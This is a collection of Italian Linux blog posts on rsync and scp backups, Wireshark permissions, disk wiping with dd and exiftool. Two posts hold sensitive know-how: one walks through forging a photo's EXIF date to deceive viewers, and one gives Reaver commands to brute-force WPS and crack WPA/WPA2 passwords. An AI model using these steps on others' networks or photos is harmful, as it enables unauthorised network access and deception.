Utilizzo di Rsync su DD-WRT

 

Utilizzo di Rsync su DD-WRT

Utilizzo di Rsync su DD-WRT

Dopo avere installato rsync sul mio router Asus RT-AC68U, utilizzando Entware. ho iniziato con il backup incrementale dei miei 3 Raspberry pi. L'utilizzo di rsync è quello standard, ma nella versione per ARM, ci sono delle piccole mancanze/differenze. Per ottenere un backup incrementale del mio centralino asterisk su Raspberry pi, ho usato:

# rsync -zzahlrvp -e 'ssh -p 2233' --progress --exclude={"/dev/*","/proc/*","/sys/*","/tmp/*","/run/*","/lost+found"} / ddwrt@192.168.1.1:/mnt/sdaX/cartella_backup

Utilizzo di Rsync su DD-WRT

enjoy ๐Ÿ˜‰

 

Trasferire cartelle tra due hosts locale-remoto in Linux con SCP

 

Trasferire cartelle tra due hosts locale-remoto in Linux con SCP

Il comando SCP in Linux è usato per trasferire files o cartelle in maniera sicura usando ssh, tra server locali e/o remoti.

Trasferire cartelle tra due hosts locale-remoto in Linux con SCP

 

Copiare file da locale a remoto:

# scp -v /path/local/file.txt remoteuser@remotehost:/remote/path/

se si utilizza una porta differente:

# scp -v -P 2200 /path/local/file.txt remoteuser@remotehost:/remote/path/

Copiare file da remoto a locale

# scp -v remoteuser@remotehost:/path/file.txt /path/local

Copiare cartella in maniera ricorsiva e compressa da locale a remoto:

# scp -vrC -P 2200 /path/local/folder remoteuser@remotehost:/remote/path/

Copiare cartella in maniera ricorsiva e compressa da remoto a locale:

# scp -vrC -P 2200 remoteuser@remotehost:/remote/folder/ /path/local/

Limitare la banda:

# scp -vrC -l 500 -P 2200 /path/folder remoteuser@remotehost:/remote/path/

Copiare file/cartella tra 2 hosts remoti:

# scp -v remoteuser1@remotehost1:/path/file.txt remoteuser2@remotehost2::/path/directory/

 

enjpy ๐Ÿ˜‰

Backup del Sistema con Rsync

 

Backup del Sistema con Rsync

 

Backup del Sistema con Rsync. Rsync è un leggero e potente strumento per il backup. Permette di eseguire backup incrementali, salvando i soli file modificati o aggiunti rispetto all'ultima operazione di backup, sia in locale che in remoto. Si può utilizzare per un backup dell'intero sistema o di cartelle specifiche.

Installazione:

# apt install rsync -y

Rsync locale:

# rsync -zav /percorso/origine /percorso/backup

per cancellare nella cartella di destinazione i file non più presenti nella cartella di origine basta aggiungere l'opzione –delete:

# rsync --delete -zav /percorso/origine /percorso/backup

Backup del Sistema:

per escludere dal backup files o cartelle si utilizza l'opzione –exclude:

# rsync -zaAXv --exclude={"/dev/*","/proc/*","/sys/*","/tmp/*","/run/*","/mnt/*","/media/*","/lost+found"} / /percorso/backup

Rsync da locale a remoto con ssh:

$ rsync -zavh -e ssh /cartella/origine_file/ remoteuser@remotehost:/cartella/backup

se si utilizza una porta diversa per ssh:

$ rsync -zavh -e 'ssh -p 2200' /cartella/origine_file/ remoteuser@remotehost:/cartella/backup

per visualizzare il progresso del backup:

$ rsync -zavh -e 'ssh -p 2200' --progress /cartella/origine_file/ remoteuser@remotehost:/cartella/backup

Rsync da remoto a locale con ssh:

$ rsync -zvah -e 'ssh -p 2200' remoteuser@remotehost:/percorso/del/file /cartella/destinazione

Rsync senza password ssh:

# ssh-keygen

alle domande successive premere sempre invio e copiare la chiave sul server:

# ssh-copy-id -i $HOME/.ssh/id_rsa.pub remoteuser@remotehost

a questo punto se tutto è andato bene non verrà più richiesta la password e si può accedere direttamente:

# ssh remoteuser@remotehost


Backup automatico:

a questo punto si può decidere che tipo di backup effettuare:

ogni giorno alle 23:00

00 23 * * *

ogni sabato alle 23:00

00 23 * * 6

oppure al 1° di ogni mese alle 23:00:

00 23 1 * *

$ crontab -e

ed inserire l'opzione desiderata:

00 23 * * * rsync -zav /percorso/origine /percorso/backup

Backup del Sistema con Rsync

enjoy ๐Ÿ˜‰

 

Wireshark abilitare interfacce di rete

 

wireshark abilitare interfacce di rete

 

Wireshark abilitare interfacce di rete. In questa guida verranno descritti i passaggi per abilitare le interfacce di rete in  wireshark Dopo avere avviato il programma bisogna andare in Capture-Options per scegliere l'interfaccia di rete per lo sniffing, ma di default queste non compaiono su Debian. Per abilitarle:

sudo apt-get install wireshark libcap2-bin
sudo groupadd wireshark
sudo usermod -a -G wireshark $USER
sudo chgrp wireshark /usr/bin/dumpcap
sudo chmod 755 /usr/bin/dumpcap
sudo setcap cap_net_raw,cap_net_admin=eip /usr/bin/dumpcap

a questo punto saranno visibili nel menu Capture-Options.

enjoy ๐Ÿ˜‰

 

Installare RetroShare amd64 su Debian Sid

 

 

 

 

RetroShare è una applicazione multipiattaforma per la condivisione di files su rete F2F, ritenuta molto sicura in quanto si autentifica con GPG e ci si connette tramite un tunnel ssh. Sul sito ufficiale ci sono pacchetti pronti per diverse distribuzioni. Nel caso specifico Debian, esiste solo il pacchetto a 32bit per Squeeze, siccome io uso Sid amd64, mi sono dovuto arrangiare:

 

wget http://ppa.launchpad.net/csoler-users/retroshare-snapshots/ubuntu/pool/main/r/retroshare/retroshare_0.5.3-0.5256~oneiric_amd64.deb

sudo dpkg -i retroshare_0.5.3-0.5256~oneiric_amd64.deb

 

una volta avviato la configurazione è intuitiva.

 

enjoy ๐Ÿ˜‰
 

Exiftool su Debian Squeeze/Wheezy/Sid pacchetti Deb

 

Avevo già parlato in passato di Exiftool, uno strumento che serve ad estrarre tutti i dati exif da una foto. Nei repo ci sono sicuramente altri programmi per ottenere i dati exif, ma questo è quello che io uso da qualche anno ed ormai mi ci sono affezzionato. Nel mio repository si trovano i pacchetti pronti:

 

Download amd64

Download i386

 

enjoy ๐Ÿ˜‰

Eliminare permanentemente tutti i dati di un disco

 

 

 

Negli ultimi periodi capita di avere chiavette usb o hard disk in abbondanza, e quindi di non riuscire più ad utilizzarli. Può capitare di regalare o vendere queste unità disco, e per una questione di sicurezza, sarebbe meglio fare in modo che nessuno si diverta a recuperare qualche dato personale. E' stato dimostrato che più del 30% dei pc connessi ad internet quotidianamente, naviga su siti porno, salvando foto e video zozzi, come fa Picchiopc. Quindi l'obiettivo è quello di rendere la vita difficile a chi vuole sbirciare nelle abitudini altrui ๐Ÿ™‚ Una volta identificato il disco da formattare, il comando è semplice:

 

$ sudo dd if=/dev/zero of=/dev/sdX

 

 

enjoy ๐Ÿ˜‰

Creare un Live DVD/CD/USB Multidistro su Debian usando MultiCD

 

 

Inserire in un unico CD/DVD o chiavetta USB, più sistemi operativi, può essere molto comodo, sia per quanto riguarda il risparmio degli stessi CD/DVD, sia perchè si avranno a portata di mano, tutti gli strumenti, che potranno aiutarci a risolvere alcune problematiche. L'altro fattore importante, secondo me, e che questo CD/DVD Live, può essere costruito in multi architetture, quindi chi avrà sui propri hard disk differenti O:S. e diferrenti architetture, si troverà un unico strumento che gli permetterà di chroottarsi all'occorrenza. MultiCD non è altro che uno script che ci aiuta a costruire il nostro DVD personalizzato, Io per esempio, ho un DVD mutidistro, di 3,8 giga, costruito con dentro una Debian Live 64bit, Clonezilla,Backtrack,Gparted,Ultimate Boot CD.

 

Requisiti:

Procurarsi le iso degli O.S supportati:

 

poi:

$ wget ftp://downloads.tuxfamily.org/multicd/multicd-6.8.sh

$ chmod +x multicd-6.8.sh

# apt-get install genisoimage

 

a questo punto bisogna modificare i nomi dei sistemi scaricati, come descritto sul sito, per esempio:

 

$ mv debian-live-6.0.3-i386-gnome-desktop.iso binary.iso

$ mv clonezilla-live-1.2.8-46-i686.iso clonezilla.iso

$ ecc. ecc. ecc.

 

adesso basta lanciare lo script MultiCD, ed aspettare qualche minuto:

 

#./multicd-6.8.sh

 

 

enjoy ๐Ÿ˜‰

Truccare la data di una foto con exiftool

 

 

                                               La mia sheela

 

Ho già parlato in passato di exiftool, e di quanto sia importante cancellare i metadati che si nascondono in una foto, prima di distribuirla in giro. Comunque, per motivi che non sto qui a spiegare, io controllo sempre i dati nelle foto, poichè, questo mi fa capire, con l'aiuto di domande mirate successive, se chi le ha inviate dice il vero. Ma se io volessi deliberatamente mentire? far credere che quella foto sia stata scattata in una data diversa, e quindi ingannare un'occhio poco attento?….come fare??? Semplice, basta manipolare la data con exiftool. Come esempio porto la foto leggermente "purificata" della mia sheela, scattata nel 2007. I dati presenti sulla foto sono i seguenti:

 

ORIGINALE:

edmond@Debianbox:~/Desktop/test$ exiftool -a -u -g1 sheela.jpg
—- ExifTool —-
ExifTool Version Number         : 8.60
—- System —-
File Name                       : sheela.jpg
Directory                       : .
File Size                       : 189 kB
File Modification Date/Time     : 2007:09:30 15:23:51+02:00
File Permissions                : rw-r—–
—- File —-
File Type                       : JPEG
MIME Type                       : image/jpeg
Image Width                     : 500
Image Height                    : 375
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
—- JFIF —-
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 72
Y Resolution                    : 72
—- Composite —-
Image Size                      : 500×375

 

quindi per manipolare la data, facendo anche una copia dell'originale, il comando da usare è il seguente:

 

$ exiftool -DateTimeOriginal='2012:01:15 14:50:04' foto.jpg

 

FAKE:
 

edmond@Debianbox:~/Desktop/test$ exiftool -DateTimeOriginal='2012:01:15 14:50:04' sheela.jpg
    1 image files updated
edmond@Debianbox:~/Desktop/test$ exiftool -a -u -g1 sheela.jpg—- ExifTool —-
ExifTool Version Number         : 8.60
—- System —-
File Name                       : sheela.jpg
Directory                       : .
File Size                       : 190 kB
File Modification Date/Time     : 2012:01:15 14:50:37+01:00
File Permissions                : rw-r—–
—- File —-
File Type                       : JPEG
MIME Type                       : image/jpeg
Exif Byte Order                 : Big-endian (Motorola, MM)
Image Width                     : 500
Image Height                    : 375
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
—- JFIF —-
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 72
Y Resolution                    : 72
—- IFD0 —-
X Resolution                    : 72
Y Resolution                    : 72
Resolution Unit                 : inches
Y Cb Cr Positioning             : Centered
—- ExifIFD —-
Exif Version                    : 0230
Date/Time Original              : 2012:01:15 14:50:04
Components Configuration        : Y, Cb, Cr, –
Flashpix Version                : 0100
Color Space                     : Uncalibrated
—- Composite —-
Image Size                      : 500×375

 

 

per cancellare tutti i metadati:

 

 

$ exiftool -all= foto.jpg

 

 

enjoy ๐Ÿ˜‰

Reaver WPS su Debian e cracking password WPA/WPA2 in meno di 12 ore

 

 

 

Reaver WPS riesce con un attaco brute force a decifrare la password wpa/wpa2 della nostra rete, in determinate condizioni. Prima di tutto il WPS o Wi-Fi Protected Setup è diffuso nei router domestici, in genere lo si trova sotto la voce wifi-protezione. La vulnerabilità si nasconde prorpio in questo standard, in quanto, se si utilizza la modalità di inserimento pin al posto del push button, questa apre una falla. Praticamente bombardando il router di  pacchetti, questo restituisce molte informazioni utili al cracking. Comunque in rete si trovano spiegazioni più esaustive e dettagliate. Come prima cosa bisogna installare aircrack-ng, e compilarselo, dato che non è più presente nei repository ufficiali, oppure prelevarlo dal mio repository. Per avere quindi reaver su Debian:

 

$ sudo apt-get install libpcap0.8-dev libsqlite3-dev

$ wget http://reaver-wps.googlecode.com/files/reaver-1.3.tar.gz

$ tar -xvf reaver-1.3.tar.gz

$ cd reaver-1.3/src/

$ ./configure

$ make

$ sudo make install

 

mettere in monitor mode la scheda:

 

# airmon-ng start wlan0

 

il comando sopra creerà mon0 in monitor mode

 

Interface    Chipset        Driver

wlan0        Ralink 2561 PCI    rt61pci – [phy0]
                (monitor mode enabled on mon0
)

 

scanning per rilevare reti wpa:

 

# walsh -i mon0 --ignore-fcs

 

attacco:

 

# reaver -i mon0 -b 00:11:22:33:44:55 --dh-small

 

per altri comandi leggere la documentazione all'interno del pacchetto.

 

enjoy ๐Ÿ˜‰